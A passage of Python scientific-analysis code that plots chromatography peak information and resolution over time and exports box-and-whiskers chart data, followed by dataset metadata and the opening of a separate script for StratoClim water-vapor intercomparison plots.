        acquisition_date_and_time_I = ['%m/%d/%Y %H:%M','%m/%d/%Y %H:%M'] window bounds, or [None,None] for all
        y_data_type_I = 'acquisition_date_and_time' (elapsed hours since first sample) or 'count' (sample index)
        plot_type_I = 'single' (one figure per component/parameter), 'multiple' (all components on one figure), or 'sub'
        filename_O = output file name prefix
        figure_format_O = figure format suffix appended to the file name
        NOTE(review): the mutable default arguments ([] and [None,None]) are
        shared across calls; safe here only because they are never mutated.
        '''
        #INPUT:
        # experiment_id_I
        # sample_names_I
        # sample_types_I
        # component_names_I
        # peakInfo_I
        # acquisition_date_and_time_I = ['%m/%d/%Y %H:%M','%m/%d/%Y %H:%M']
        # y_data_type_I = 'acquisition_date_and_time' or 'count'
        # plot_type_I = 'single', 'multiple', or 'sub'
        print('export_peakInformation...')
        #TODO: remove after refactor
        mplot = matplot();
        #convert string date time to datetime
        # e.g. time.strptime('4/15/2014 15:51','%m/%d/%Y %H:%M')
        acquisition_date_and_time = [];
        if acquisition_date_and_time_I and acquisition_date_and_time_I[0] and acquisition_date_and_time_I[1]:
            for dateandtime in acquisition_date_and_time_I:
                time_struct = strptime(dateandtime,'%m/%d/%Y %H:%M')
                dt = datetime.fromtimestamp(mktime(time_struct))
                acquisition_date_and_time.append(dt);
        else: acquisition_date_and_time=[None,None]
        data_O = [];
        component_names_all = [];
        # get sample names
        # explicit sample names are honored only when exactly one sample type is given;
        # otherwise the names are queried per sample type
        if sample_names_I and sample_types_I and len(sample_types_I)==1:
            sample_names = sample_names_I;
            sample_types = [sample_types_I[0] for sn in sample_names];
        else:
            sample_names = [];
            sample_types = [];
            for st in sample_types_I:
                sample_names_tmp = [];
                sample_names_tmp = self.get_sampleNames_experimentIDAndSampleType(experiment_id_I,st);
                sample_names.extend(sample_names_tmp);
                sample_types_tmp = [];
                sample_types_tmp = [st for sn in sample_names_tmp];
                sample_types.extend(sample_types_tmp);
        # collect peak info rows (one dict per sample/component) into data_O
        for sn in sample_names:
            print('analyzing peakInformation for sample_name ' + sn);
            # get sample description
            desc = {};
            desc = self.get_description_experimentIDAndSampleID_sampleDescription(experiment_id_I,sn);
            # get component names
            if component_names_I:
                component_names = component_names_I;
            else:
                component_names = [];
                component_names = self.get_componentsNames_experimentIDAndSampleName(experiment_id_I,sn);
            component_names_all.extend(component_names);
            for cn in component_names:
                # get rt, height, s/n
                sst_data = {};
                sst_data = self.get_peakInfo_sampleNameAndComponentName(sn,cn,acquisition_date_and_time);
                if sst_data:
                    tmp = {};
                    tmp.update(sst_data);
                    tmp.update(desc);
                    tmp.update({'sample_name':sn});
                    data_O.append(tmp);
        # Plot data over time
        if component_names_I:
            # use input order
            component_names_unique = component_names_I;
        else:
            # use alphabetical order
            component_names_unique = list(set(component_names_all));
            component_names_unique.sort();
        if plot_type_I == 'single':
            # one figure per component per parameter
            for cn in component_names_unique:
                data_parameters = {};
                data_parameters_stats = {};
                for parameter in peakInfo_I:
                    data_parameters[parameter] = [];
                    acquisition_date_and_times = [];
                    acquisition_date_and_times_hrs = [];
                    sample_names_parameter = [];
                    sample_types_parameter = [];
                    component_group_name = None;
                    for sn_cnt,sn in enumerate(sample_names):
                        for d in data_O:
                            if d['sample_name'] == sn and d['component_name'] == cn and d[parameter]:
                                data_parameters[parameter].append(d[parameter]);
                                acquisition_date_and_times.append(d['acquisition_date_and_time'])
                                # NOTE(review): 'day' is weighted by 365.242 (not 24) in this
                                # hour conversion; elapsed times stay consistent within a
                                # month, but verify the intended conversion factor
                                acquisition_date_and_times_hrs.append(d['acquisition_date_and_time'].year*8765.81277 + d['acquisition_date_and_time'].month*730.484 + d['acquisition_date_and_time'].day*365.242 + d['acquisition_date_and_time'].hour + d['acquisition_date_and_time'].minute / 60. + d['acquisition_date_and_time'].second / 3600.); #convert using datetime object
                                sample_names_parameter.append(sn);
                                sample_types_parameter.append(sample_types[sn_cnt])
                                component_group_name = d['component_group_name'];
                    # normalize time
                    acquisition_date_and_times_hrs.sort();
                    t_start = min(acquisition_date_and_times_hrs);
                    for t_cnt,t in enumerate(acquisition_date_and_times_hrs):
                        if y_data_type_I == 'acquisition_date_and_time':acquisition_date_and_times_hrs[t_cnt] = t - t_start;
                        elif y_data_type_I == 'count':acquisition_date_and_times_hrs[t_cnt] = t_cnt;
                    title = cn + '\n' + parameter;
                    # NOTE(review): figure_format_O is appended without a '.' separator
                    # (default 'png' yields '...parameterpng'); confirm callers pass '.png'
                    filename = filename_O + '_' + experiment_id_I + '_' + cn + '_' + parameter + figure_format_O;
                    mplot.scatterLinePlot(title,x_title_I,y_title_I,acquisition_date_and_times_hrs,data_parameters[parameter],fit_func_I='lowess',show_eqn_I=False,show_r2_I=False,filename_I=filename,show_plot_I=False);
        if plot_type_I == 'multiple':
            # one figure per parameter; one series per component
            for parameter in peakInfo_I:
                data_parameters = [];
                acquisition_date_and_times = [];
                acquisition_date_and_times_hrs = [];
                sample_names_parameter = [];
                sample_types_parameter = [];
                component_group_names = [];
                component_names = [];
                for cn_cnt,cn in enumerate(component_names_unique):
                    data = [];
                    acquisition_date_and_time = [];
                    acquisition_date_and_time_hrs = [];
                    sample_name_parameter = [];
                    sample_type_parameter = [];
                    for sn_cnt,sn in enumerate(sample_names):
                        for d in data_O:
                            if d['sample_name'] == sn and d['component_name'] == cn and d[parameter]:
                                data.append(d[parameter])
                                acquisition_date_and_time.append(d['acquisition_date_and_time'])
                                # NOTE(review): same day*365.242 weighting as above — verify
                                acquisition_date_and_time_hrs.append(d['acquisition_date_and_time'].year*8765.81277 + d['acquisition_date_and_time'].month*730.484 + d['acquisition_date_and_time'].day*365.242 + d['acquisition_date_and_time'].hour + d['acquisition_date_and_time'].minute / 60. + d['acquisition_date_and_time'].second / 3600.); #convert using datetime object
                                sample_name_parameter.append(sn);
                                sample_type_parameter.append(sample_types[sn_cnt])
                                if sn_cnt == 0:
                                    component_group_names.append(d['component_group_name']);
                                    component_names.append(d['component_name']);
                    # normalize time
                    acquisition_date_and_time_hrs.sort();
                    t_start = min(acquisition_date_and_time_hrs);
                    for t_cnt,t in enumerate(acquisition_date_and_time_hrs):
                        if y_data_type_I == 'acquisition_date_and_time':acquisition_date_and_time_hrs[t_cnt] = t - t_start;
                        elif y_data_type_I == 'count':acquisition_date_and_time_hrs[t_cnt] = t_cnt;
                    data_parameters.append(data);
                    acquisition_date_and_times.append(acquisition_date_and_time)
                    acquisition_date_and_times_hrs.append(acquisition_date_and_time_hrs);
                    sample_names_parameter.append(sample_name_parameter);
                    sample_types_parameter.append(sample_type_parameter)
                title = parameter;
                # NOTE(review): figure_format_O appended without a '.' separator — see above
                filename = filename_O + '_' + experiment_id_I + '_' + parameter + figure_format_O;
                mplot.multiScatterLinePlot(title,x_title_I,y_title_I,acquisition_date_and_times_hrs,data_parameters,data_labels_I=component_group_names,fit_func_I=None,show_eqn_I=False,show_r2_I=False,filename_I=filename,show_plot_I=False);
def export_scatterLinePlot_peakResolution_matplot(self,experiment_id_I,sample_names_I=[],sample_types_I=['Standard'],component_name_pairs_I=[],
peakInfo_I = ['rt_dif','resolution'],
acquisition_date_and_time_I=[None,None],
x_title_I='Time [hrs]',y_title_I='Retention Time [min]',y_data_type_I='acquisition_date_and_time',
plot_type_I='single'):
'''Analyze resolution for critical pairs'''
#Input:
# experiment_id_I
# sample_names_I
# sample_types_I
# component_name_pairs_I = [[component_name_1,component_name_2],...]
# acquisition_date_and_time_I = ['%m/%d/%Y %H:%M','%m/%d/%Y %H:%M']
#TODO: remove after refactor
mplot = matplot();
print('export_peakInformation_resolution...')
#convert string date time to datetime
# e.g. time.strptime('4/15/2014 15:51','%m/%d/%Y %H:%M')
acquisition_date_and_time = [];
if acquisition_date_and_time_I and acquisition_date_and_time_I[0] and acquisition_date_and_time_I[1]:
for dateandtime in acquisition_date_and_time_I:
time_struct = strptime(dateandtime,'%m/%d/%Y %H:%M')
dt = datetime.fromtimestamp(mktime(time_struct))
acquisition_date_and_time.append(dt);
else: acquisition_date_and_time=[None,None]
data_O = [];
component_names_pairs_all = [];
# get sample names
if sample_names_I and sample_types_I and len(sample_types_I)==1:
sample_names = sample_names_I;
sample_types = [sample_types_I[0] for sn in sample_names];
else:
sample_names = [];
sample_types = [];
for st in sample_types_I:
sample_names_tmp = [];
sample_names_tmp = self.get_sampleNames_experimentIDAndSampleType(experiment_id_I,st);
sample_names.extend(sample_names_tmp);
sample_types_tmp = [];
sample_types_tmp = [st for sn in sample_names_tmp];
sample_types.extend(sample_types_tmp);
for sn in sample_names:
print('analyzing peakInformation for sample_name ' + sn);
for component_name_pair in component_name_pairs_I:
# get critical pair data
cpd1 = {};
cpd2 = {};
cpd1 = self.get_peakInfo_sampleNameAndComponentName(sn,component_name_pair[0],acquisition_date_and_time);
cpd2 = self.get_peakInfo_sampleNameAndComponentName(sn,component_name_pair[1],acquisition_date_and_time);
# calculate the RT difference and resolution
rt_dif = 0.0;
rt_dif = abs(cpd1['retention_time']-cpd2['retention_time'])
resolution = 0.0;
resolution = rt_dif/(0.5*(cpd1['width_at_50']+cpd2['width_at_50']));
# record data
data_O.append({'component_name_pair':component_name_pair,
'rt_dif':rt_dif,
'resolution':resolution,
'component_group_name_pair':[cpd1['component_group_name'],cpd2['component_group_name']],
'sample_name':sn,
'acquisition_date_and_time':cpd1['acquisition_date_and_time']});
if plot_type_I == 'single':
for cnp in component_name_pairs_I:
data_parameters = {};
data_parameters_stats = {};
for parameter in peakInfo_I:
data_parameters[parameter] = [];
acquisition_date_and_times = [];
acquisition_date_and_times_hrs = [];
sample_names_parameter = [];
sample_types_parameter = [];
component_group_name_pair = None;
for sn_cnt,sn in enumerate(sample_names):
for d in data_O:
if d['sample_name'] == sn and d['component_name_pair'] == cnp and d[parameter]:
data_parameters[parameter].append(d[parameter]);
acquisition_date_and_times.append(d['acquisition_date_and_time'])
acquisition_date_and_times_hrs.append(d['acquisition_date_and_time'].year*8765.81277 + d['acquisition_date_and_time'].month*730.484 + d['acquisition_date_and_time'].day*365.242 + d['acquisition_date_and_time'].hour + d['acquisition_date_and_time'].minute / 60. + d['acquisition_date_and_time'].second / 3600.); #convert using datetime object
sample_names_parameter.append(sn);
sample_types_parameter.append(sample_types[sn_cnt])
component_group_name_pair = d['component_group_name_pair'];
# normalize time
acquisition_date_and_times_hrs.sort();
t_start = min(acquisition_date_and_times_hrs);
for t_cnt,t in enumerate(acquisition_date_and_times_hrs):
if y_data_type_I == 'acquisition_date_and_time':acquisition_date_and_times_hrs[t_cnt] = t - t_start;
elif y_data_type_I == 'count':acquisition_date_and_times_hrs[t_cnt] = t_cnt;
title = cn + '\n' + parameter;
filename = 'data/_output/' + experiment_id_I + '_' + cn + '_' + parameter + '.png'
mplot.scatterLinePlot(title,x_title_I,y_title_I,acquisition_date_and_times_hrs,data_parameters[parameter],fit_func_I='lowess',show_eqn_I=False,show_r2_I=False,filename_I=filename,show_plot_I=False);
if plot_type_I == 'multiple':
for parameter in peakInfo_I:
data_parameters = [];
acquisition_date_and_times = [];
acquisition_date_and_times_hrs = [];
sample_names_parameter = [];
sample_types_parameter = [];
component_group_names_pair = [];
component_names_pair = [];
for cnp_cnt,cnp in enumerate(component_name_pairs_I):
data = [];
acquisition_date_and_time = [];
acquisition_date_and_time_hrs = [];
sample_name_parameter = [];
sample_type_parameter = [];
for sn_cnt,sn in enumerate(sample_names):
for d in data_O:
if d['sample_name'] == sn and d['component_name_pair'] == cnp and d[parameter]:
data.append(d[parameter])
acquisition_date_and_time.append(d['acquisition_date_and_time'])
acquisition_date_and_time_hrs.append(d['acquisition_date_and_time'].year*8765.81277 + d['acquisition_date_and_time'].month*730.484 + d['acquisition_date_and_time'].day*365.242 + d['acquisition_date_and_time'].hour + d['acquisition_date_and_time'].minute / 60. + d['acquisition_date_and_time'].second / 3600.); #convert using datetime object
sample_name_parameter.append(sn);
sample_type_parameter.append(sample_types[sn_cnt])
if sn_cnt == 0:
component_group_names_pair.append(d['component_group_name_pair']);
component_names_pair.append(d['component_name_pair']);
# normalize time
acquisition_date_and_time_hrs.sort();
t_start = min(acquisition_date_and_time_hrs);
for t_cnt,t in enumerate(acquisition_date_and_time_hrs):
if y_data_type_I == 'acquisition_date_and_time':acquisition_date_and_time_hrs[t_cnt] = t - t_start;
elif y_data_type_I == 'count':acquisition_date_and_time_hrs[t_cnt] = t_cnt;
data_parameters.append(data);
acquisition_date_and_times.append(acquisition_date_and_time)
acquisition_date_and_times_hrs.append(acquisition_date_and_time_hrs);
sample_names_parameter.append(sample_name_parameter);
sample_types_parameter.append(sample_type_parameter)
# create data labels
data_labels = [];
for component_group_names in component_group_names_pair:
data_labels.append(component_group_names[0] + '/' + component_group_names[1]);
title = parameter;
filename = 'data/_output/' + experiment_id_I + '_' + parameter + '.eps'
mplot.multiScatterLinePlot(title,x_title_I,y_title_I,acquisition_date_and_times_hrs,data_parameters,data_labels_I=data_labels,fit_func_I=None,show_eqn_I=False,show_r2_I=False,filename_I=filename,show_plot_I=False);
    def export_boxAndWhiskersPlot_peakInformation_matplot(self,experiment_id_I,
                        peakInfo_parameter_I = ['height','retention_time','width_at_50','signal_2_noise'],
                        component_names_I=[],
                        filename_O = 'tmp',
                        figure_format_O = '.png'):
        '''Generate one box-and-whiskers plot per peak parameter from the
        peakInformation table.
        INPUT:
        experiment_id_I = experiment to analyze
        peakInfo_parameter_I = peak parameters to plot; queried from the table when empty
        component_names_I = explicit component names; queried per parameter when empty
        filename_O = output file name prefix
        figure_format_O = figure format suffix (including the '.')
        '''
        #TODO: remove after refactor
        mplot = matplot();
        print('export_boxAndWhiskersPlot...')
        if peakInfo_parameter_I:
            peakInfo_parameter = peakInfo_parameter_I;
        else:
            peakInfo_parameter = [];
            peakInfo_parameter = self.get_peakInfoParameter_experimentID_dataStage01PeakInformation(experiment_id_I);
        for parameter in peakInfo_parameter:
            data_plot_mean = [];
            data_plot_cv = [];
            data_plot_ci = [];
            data_plot_parameters = [];
            data_plot_component_names = [];
            data_plot_data = [];
            data_plot_units = [];
            if component_names_I:
                component_names = component_names_I;
            else:
                component_names = [];
                component_names = self.get_componentNames_experimentIDAndPeakInfoParameter_dataStage01PeakInformation(experiment_id_I,parameter);
            for cn in component_names:
                print('generating boxAndWhiskersPlot for component_name ' + cn);
                # get the data
                data = {};
                data = self.get_row_experimentIDAndPeakInfoParameterComponentName_dataStage01PeakInformation(experiment_id_I,parameter,cn)
                if data and data['peakInfo_ave']:
                    # record data for plotting
                    data_plot_mean.append(data['peakInfo_ave']);
                    data_plot_cv.append(data['peakInfo_cv']);
                    # confidence interval as [lower bound, upper bound]
                    data_plot_ci.append([data['peakInfo_lb'],data['peakInfo_ub']]);
                    data_plot_data.append(data['peakInfo_data']);
                    data_plot_parameters.append(parameter);
                    data_plot_component_names.append(data['component_group_name']);
                    # NOTE(review): the y-axis label is hard-coded to retention-time
                    # units for every parameter (height, s/n, ...) — confirm intent
                    data_plot_units.append('Retention_time [min]');
            # visualize the stats:
            # NOTE(review): data_plot_se (and data_plot_cv) are computed but never
            # passed to the plot call
            data_plot_se = [(x[1]-x[0])/2 for x in data_plot_ci]
            filename = filename_O + '_' + experiment_id_I + '_' + parameter + figure_format_O;
            mplot.boxAndWhiskersPlot(data_plot_parameters[0],data_plot_component_names,data_plot_units[0],'samples',data_plot_data,data_plot_mean,data_plot_ci,filename_I=filename,show_plot_I=False);
def export_boxAndWhiskersPlot_peakResolution_matplot(self,experiment_id_I,component_name_pairs_I=[],
peakInfo_parameter_I = ['rt_dif','resolution'],
filename_O = 'tmp',
figure_format_O = '.png'):
'''generate a boxAndWhiskers plot from peakResolution table'''
#TODO: remove after refactor
mplot = matplot();
print('export_boxAndWhiskersPlot...')
if peakInfo_parameter_I:
peakInfo_parameter = peakInfo_parameter_I;
else:
peakInfo_parameter = [];
peakInfo_parameter = self.get_peakInfoParameter_experimentID_dataStage01PeakResolution(experiment_id_I);
for parameter in peakInfo_parameter:
data_plot_mean = [];
data_plot_cv = [];
data_plot_ci = [];
data_plot_parameters = [];
data_plot_component_names = [];
data_plot_data = [];
data_plot_units = [];
if component_name_pairs_I:
component_name_pairs = component_name_pairs_I;
else:
component_name_pairs = [];
component_name_pairs = self.get_componentNamePairs_experimentIDAndPeakInfoParameter_dataStage01PeakResolution(experiment_id_I,parameter);
for cn in component_name_pairs:
# get the data
data = {};
data = self.get_row_experimentIDAndPeakInfoParameterComponentName_dataStage01PeakResolution(experiment_id_I,parameter,cn)
if data and data['peakInfo_ave']:
# record data for plotting
data_plot_mean.append(data['peakInfo_ave']);
data_plot_cv.append(data['peakInfo_cv']);
data_plot_ci.append([data['peakInfo_lb'],data['peakInfo_ub']]);
data_plot_data.append(data['peakInfo_data']);
data_plot_parameters.append(parameter);
data_plot_component_names.append(data['component_group_name_pair'][0]+'/'+data['component_group_name_pair'][0]);
data_plot_units.append('Retention_time [min]');
# visualize the stats:
data_plot_se = [(x[1]-x[0])/2 for x in data_plot_ci]
filename = filename_O + '_' + experiment_id_I + '_' + parameter + figure_format_O;
mplot.boxAndWhiskersPlot(data_plot_parameters[0],data_plot_component_names,data_plot_units[0],'samples',data_plot_data,data_plot_mean,data_plot_ci,filename_I=filename,show_plot_I=False);
def export_boxAndWhiskersPlot_peakInformation_js(
self,
experiment_id_I=[],
analysis_id_I=[],
sample_name_abbreviations_I=[],
component_names_I=[],
component_group_names_I=[],
peakInfo_I = ['height','retention_time','width_at_50','signal_2_noise'],
data_dir_I='tmp'):
'''Export data for a box and whiskers plot from peakInformation
INPUT:
#TODO add in template for box and whiskers plot from stats
'''
print('export_boxAndWhiskersPlot...')
data_O = [];
#if peakInfo_parameter_I:
# peakInfo_parameter = peakInfo_parameter_I;
#else:
# peakInfo_parameter = [];
# peakInfo_parameter = self.get_peakInfoParameter_experimentID_dataStage01PeakInformation(experiment_id_I);
#for parameter in peakInfo_parameter:
# if component_names_I:
# component_names = component_names_I;
# else:
# component_names = [];
# component_names = self.get_componentNames_experimentIDAndPeakInfoParameter_dataStage01PeakInformation(experiment_id_I,parameter);
# for cn in component_names:
# print('generating boxAndWhiskersPlot for component_name ' + cn);
# # get the data
# row = [];
# row = self.get_row_experimentIDAndPeakInfoParameterComponentName_dataStage01PeakInformation(experiment_id_I,parameter,cn);
# if row:
# #TODO: fix type in database 'acqusition_date_and_times'
# tmp_list = [];
# for d in row['acqusition_date_and_times']:
# tmp = None;
# tmp = self.convert_datetime2string(d);
# tmp_list.append(tmp);
# row['acqusition_date_and_times'] = tmp_list;
# row['component_name'] = re.escape(row['component_name']);
# data_O.append(row);
data_O = self.get_row_analysisID_dataStage01PeakInformation(
analysis_id_I=analysis_id_I,
experiment_id_I=experiment_id_I,
peakInfo_parameter_I=peakInfo_I,
component_name_I=component_names_I,
component_group_name_I=component_group_names_I,
sample_name_abbreviation_I=sample_name_abbreviations_I
)
# dump chart parameters to a js files
data1_keys = ['experiment_id',
'component_group_name',
'component_name',
'peakInfo_parameter',
#'peakInfo_ave',
#'peakInfo_cv',
#'peakInfo_lb',
#'peakInfo_ub',
#'peakInfo_units',
'sample_name_abbreviation',
#'sample_names',
#'sample_types',
#'acqusition_date_and_times'
];
data1_nestkeys = ['component_name'];
data1_keymap = {'xdata':'component_name',
'ydatamean':'peakInfo_ave',
'ydatalb':'peakInfo_lb',
'ydataub':'peakInfo_ub',
#'ydatamin':None,
#'ydatamax':None,
#'ydataiq1':None,
#'ydataiq3':None,
#'ydatamedian':None,
'serieslabel':'peakInfo_parameter',
'featureslabel':'component_name'};
# make the data object
dataobject_O = [{"data":data_O,"datakeys":data1_keys,"datanestkeys":data1_nestkeys}];
# make the tile parameter objects
formtileparameters_O = {'tileheader':'Filter menu','tiletype':'html','tileid':"filtermenu1",'rowid':"row1",'colid':"col1",
'tileclass':"panel panel-default",'rowclass':"row",'colclass':"col-sm-4"};
formparameters_O = {'htmlid':'filtermenuform1',"htmltype":'form_01',"formsubmitbuttonidtext":{'id':'submit1','text':'submit'},"formresetbuttonidtext":{'id':'reset1','text':'reset'},"formupdatebuttonidtext":{'id':'update1','text':'update'}};
formtileparameters_O.update(formparameters_O);
svgparameters_O = {"svgtype":'boxandwhiskersplot2d_02',"svgkeymap":[data1_keymap],
'svgid':'svg1',
"svgmargin":{ 'top': 50, 'right': 150, 'bottom': 50, 'left': 50 },
"svgwidth":500,"svgheight":350,
"svgx1axislabel":"component_name",
"svgy1axislabel":"parameter_value",
'svgformtileid':'filtermenu1','svgresetbuttonid':'reset1','svgsubmitbuttonid':'submit1'};
svgtileparameters_O = {'tileheader':'Custom box and whiskers plot',
'tiletype':'svg',
'tileid':"tile2",
'rowid':"row1",
'colid':"col2",
'tileclass':"panel panel-default",'rowclass':"row",'colclass':"col-sm-8"};
svgtileparameters_O.update(svgparameters_O);
tableparameters_O = {"tabletype":'responsivetable_01',
'tableid':'table1',
"tablefilters":None,
"tableclass":"table table-condensed table-hover",
'tableformtileid':'filtermenu1','tableresetbuttonid':'reset1','tablesubmitbuttonid':'submit1'};
tabletileparameters_O = {'tileheader':'peakInformation','tiletype':'table','tileid':"tile3",'rowid':"row2",'colid':"col1",
'tileclass':"panel panel-default",'rowclass':"row",'colclass':"col-sm-12"};
tabletileparameters_O.update(tableparameters_O);
parametersobject_O = [formtileparameters_O,svgtileparameters_O,tabletileparameters_O];
tile2datamap_O = {"filtermenu1":[0],"tile2":[0],"tile3":[0]};
# dump the data to a json file
ddtutilities = ddt_container(parameters_I = parametersobject_O,data_I = dataobject_O,tile2datamap_I = tile2datamap_O,filtermenu_I = None);
if data_dir_I=='tmp':
filename_str = self.settings['visualization_data'] + '/tmp/ddt_data.js'
elif data_dir_I=='data_json':
data_json_O = ddtutilities.get_allObjects_js();
return data_json_O;
with open(filename_str,'w') as file:
file.write(ddtutilities.get_allObjects());
def export_boxAndWhiskersPlot_peakResolution_js(self,experiment_id_I,
component_name_pairs_I=[],
peakInfo_parameter_I = ['rt_dif','resolution'],
data_dir_I='tmp'):
'''Export data for a box and whiskers plot'''
print('export_boxAndWhiskersPlot...')
data_O=[];
if peakInfo_parameter_I:
peakInfo_parameter = peakInfo_parameter_I;
else:
peakInfo_parameter = [];
peakInfo_parameter = self.get_peakInfoParameter_experimentID_dataStage01PeakResolution(experiment_id_I);
for parameter in peakInfo_parameter:
if component_name_pairs_I:
component_name_pairs = component_name_pairs_I;
else:
component_name_pairs = [];
component_name_pairs = self.get_componentNamePairs_experimentIDAndPeakInfoParameter_dataStage01PeakResolution(experiment_id_I,parameter);
for cn in component_name_pairs:
# get the data
row = {};
row = self.get_row_experimentIDAndPeakInfoParameterComponentName_dataStage01PeakResolution(experiment_id_I,parameter,cn)
if row and row['peakInfo_ave']:
#TODO: fix type in database 'acqusition_date_and_times'
tmp_list = [];
for d in row['acqusition_date_and_times']:
tmp = None;
tmp = self.convert_datetime2string(d);
tmp_list.append(tmp);
row['acqusition_date_and_times'] = tmp_list;
data_O.append(row);
# dump chart parameters to a js files
data1_keys = ['experiment_id',
'component_group_name_pair',
'component_name_pair',
'peakInfo_parameter',
#'peakInfo_ave',
#'peakInfo_cv',
#'peakInfo_lb',
#'peakInfo_ub',
#'peakInfo_units',
'sample_names',
'sample_types',
#'acqusition_date_and_times'
];
data1_nestkeys = ['component_name_pair'];
data1_keymap = {'xdata':'component_name_pair',
'ydatamean':'peakInfo_ave',
'ydatalb':'peakInfo_lb',
'ydataub':'peakInfo_ub',
#'ydatamin':None,
#'ydatamax':None,
#'ydataiq1':None,
#'ydataiq3':None,
#'ydatamedian':None,
'serieslabel':'peakInfo_parameter',
'featureslabel':'component_name_pair'};
# make the data object
dataobject_O = [{"data":data_O,"datakeys":data1_keys,"datanestkeys":data1_nestkeys}];
# make the tile parameter objects
formtileparameters_O = {'tileheader':'Filter menu','tiletype':'html','tileid':"filtermenu1",'rowid':"row1",'colid':"col1",
'tileclass':"panel panel-default",'rowclass':"row",'colclass':"col-sm-4"};
formparameters_O = {'htmlid':'filtermenuform1',"htmltype":'form_01',"formsubmitbuttonidtext":{'id':'submit1','text':'submit'},"formresetbuttonidtext":{'id':'reset1','text':'reset'},"formupdatebuttonidtext":{'id':'update1','text':'update'}};
formtileparameters_O.update(formparameters_O);
svgparameters_O = {"svgtype":'boxandwhiskersplot2d_01',"svgkeymap":[data1_keymap],
'svgid':'svg1',
"svgmargin":{ 'top': 50, 'right': 150, 'bottom': 50, 'left': 50 },
"svgwidth":500,"svgheight":350,
"svgx1axislabel":"component_name_pair","svgy1axislabel":"parameter_value",
'svgformtileid':'filtermenu1','svgresetbuttonid':'reset1','svgsubmitbuttonid':'submit1'};
svgtileparameters_O = {'tileheader':'Custom box and whiskers plot','tiletype':'svg','tileid':"tile2",'rowid':"row1",'colid':"col2",
'tileclass':"panel panel-default",'rowclass':"row",'colclass':"col-sm-8"};
svgtileparameters_O.update(svgparameters_O);
tableparameters_O = {"tabletype":'responsivetable_01',
'tableid':'table1',
"tablefilters":None,
"tableclass":"table table-condensed table-hover",
'tableformtileid':'filtermenu1','tableresetbuttonid':'reset1','tablesubmitbuttonid':'submit1'};
tabletileparameters_O = {'tileheader':'peakResolution','tiletype':'table','tileid':"tile3",'rowid':"row2",'colid':"col1",
'tileclass':"panel panel-default",'rowclass':"row",'colclass':"col-sm-12"};
tabletileparameters_O.update(tableparameters_O);
parametersobject_O = [formtileparameters_O,svgtileparameters_O,tabletileparameters_O];
tile2datamap_O = {"filtermenu1":[0],"tile2":[0],"tile3":[0]};
# dump the data to a json file
ddtutilities = ddt_container(parameters_I = parametersobject_O,data_I = dataobject_O,tile2datamap_I = tile2datamap_O,filtermenu_I = None);
if data_dir_I=='tmp':
filename_str = self.settings['visualization_data'] + '/tmp/ddt_data.js'
elif data_dir_I=='data_json':
data_json_O = ddtutilities.get_allObjects_js();
return data_json_O;
with open(filename_str,'w') as file:
file.write(ddtutilities.get_allObjects());
| 59.716393 | 374 | 0.587037 | 3,776 | 36,427 | 5.255032 | 0.092161 | 0.041627 | 0.099783 | 0.088696 | 0.875271 | 0.842665 | 0.828151 | 0.819281 | 0.809303 | 0.807892 | 0 | 0.01452 | 0.313696 | 36,427 | 610 | 375 | 59.716393 | 0.77916 | 0.088396 | 0 | 0.705508 | 0 | 0 | 0.149339 | 0.045096 | 0 | 0 | 0 | 0.004918 | 0 | 0 | null | null | 0 | 0.016949 | null | null | 0.019068 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2867c408a8f9696c8d7bd5acc7262eab2046ff7d | 82 | py | Python | object_rest/__init__.py | jmcs/object-rest | 74398d76dae1f0f0471081376f2b9b593e74e4cb | [
"MIT"
] | null | null | null | object_rest/__init__.py | jmcs/object-rest | 74398d76dae1f0f0471081376f2b9b593e74e4cb | [
"MIT"
] | null | null | null | object_rest/__init__.py | jmcs/object-rest | 74398d76dae1f0f0471081376f2b9b593e74e4cb | [
"MIT"
] | null | null | null | from object_rest.service import Service
from object_rest.documentation import help | 41 | 42 | 0.890244 | 12 | 82 | 5.916667 | 0.583333 | 0.28169 | 0.394366 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085366 | 82 | 2 | 42 | 41 | 0.946667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
28682c9629780d772ab1faa5bd7d3d2094084789 | 15,834 | py | Python | fig2_scatter_h2o.py | claresinger/StratoClim_H2O_Intercomparison | f9aaad47e7832ac1e10195f94d98c83c612fefc7 | [
"Apache-2.0"
] | null | null | null | fig2_scatter_h2o.py | claresinger/StratoClim_H2O_Intercomparison | f9aaad47e7832ac1e10195f94d98c83c612fefc7 | [
"Apache-2.0"
] | null | null | null | fig2_scatter_h2o.py | claresinger/StratoClim_H2O_Intercomparison | f9aaad47e7832ac1e10195f94d98c83c612fefc7 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
import matplotlib.gridspec as gridspec
import seaborn
import datetime
import scipy.stats as stats
# StratoClim flight numbers analyzed in this figure
flno = [2,3,4,6,7,8]
# per-flight plot colors, indexed by FLIGHT-1
colors = np.array(["k","#045275","#0C7BDC","#7CCBA2","k","#FED976","#F0746E","#7C1D6F"])
# per-flight number of samples by which the cloudy flag is extended forward in time
maxlag = [0,0,5,10,10,20]
# colormap used for the 2-D histogram panels
cmap = 'YlGnBu'
def h2o_pt_by_pt_whist6(dat):
    '''Build the six-panel point-by-point H2O intercomparison figure
    (FISH vs. FLASH and ChiWIS vs. FLASH; clear-sky and in-cloud): top row
    colored scatter per flight with a 2-100 ppmv inset, bottom row 2-D
    histograms; saves fig2-scatter-h2o-hist6.png.
    Parameters
    ----------
    dat : pandas.DataFrame with columns NICE, MASBR, FLIGHT, ALT, TIME,
        PRES_CELL, FLAG, FLH2O, FIH2O, H2O (assumed schema — confirm against
        the loader that produces this frame). Mutated in place: adds CLOUDY,
        ASCENT_FLAG, CELL_FLAG, F7_DIVE flag columns.
    '''
    # add cloudy flag
